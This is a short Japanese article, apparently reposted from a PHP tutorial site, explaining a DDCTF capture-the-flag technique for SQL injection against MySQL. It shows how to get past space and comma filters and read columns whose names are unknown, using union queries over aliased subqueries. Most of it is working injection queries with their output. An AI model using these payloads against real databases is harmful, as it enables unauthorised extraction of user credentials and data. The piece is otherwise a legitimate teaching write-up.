この記事では、主に Mysql 不明なフィールド名を賢く回避する方法を紹介します。この記事には、mysql を学習するための参考となる学習価値があります。以下で一緒に見てみましょう。 。
前書き
この記事では、DDCTF の 5 番目の質問である、未知のフィールド名を回避するテクニックを紹介します。そのアイデアは素晴らしく、明確です。詳細な紹介:実装アイデア
質問では、スペースとカンマを %0a、%0b、%0c、%0d、%a0 でフィルタリングするか、括弧を直接使用してバイパスします。 join を使用するとカンマを回避できます。フラグが格納されているフィールド名は不明ですが、inmation_schema.columns ではテーブル名の 16 進数もフィルターされます。つまり、フィールド名は取得できません。 共同クエリを使用できます。プロセスは次のとおりです。アイデアは、フラグを取得して、既知のフィールドの名前の下に表示することです。
サンプルコード: mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
| 1 | admin | admin888 | 110@110.com |
| 2 | test | test123 | 119@119.com |
| 3 | cs | cs123 | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4 |
+-------------+
| 4 |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
+-------------+
| 4 |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id | username | password | email |
+-------------+----------+----------+-------------+
| 1 | admin | admin888 | 110@110.com |
| 120@120.com | 1 | 1 | 1 |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)
概要
以上がMysql が未知のフィールド名を巧みにバイパスする方法についてのコード例の詳細な説明の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。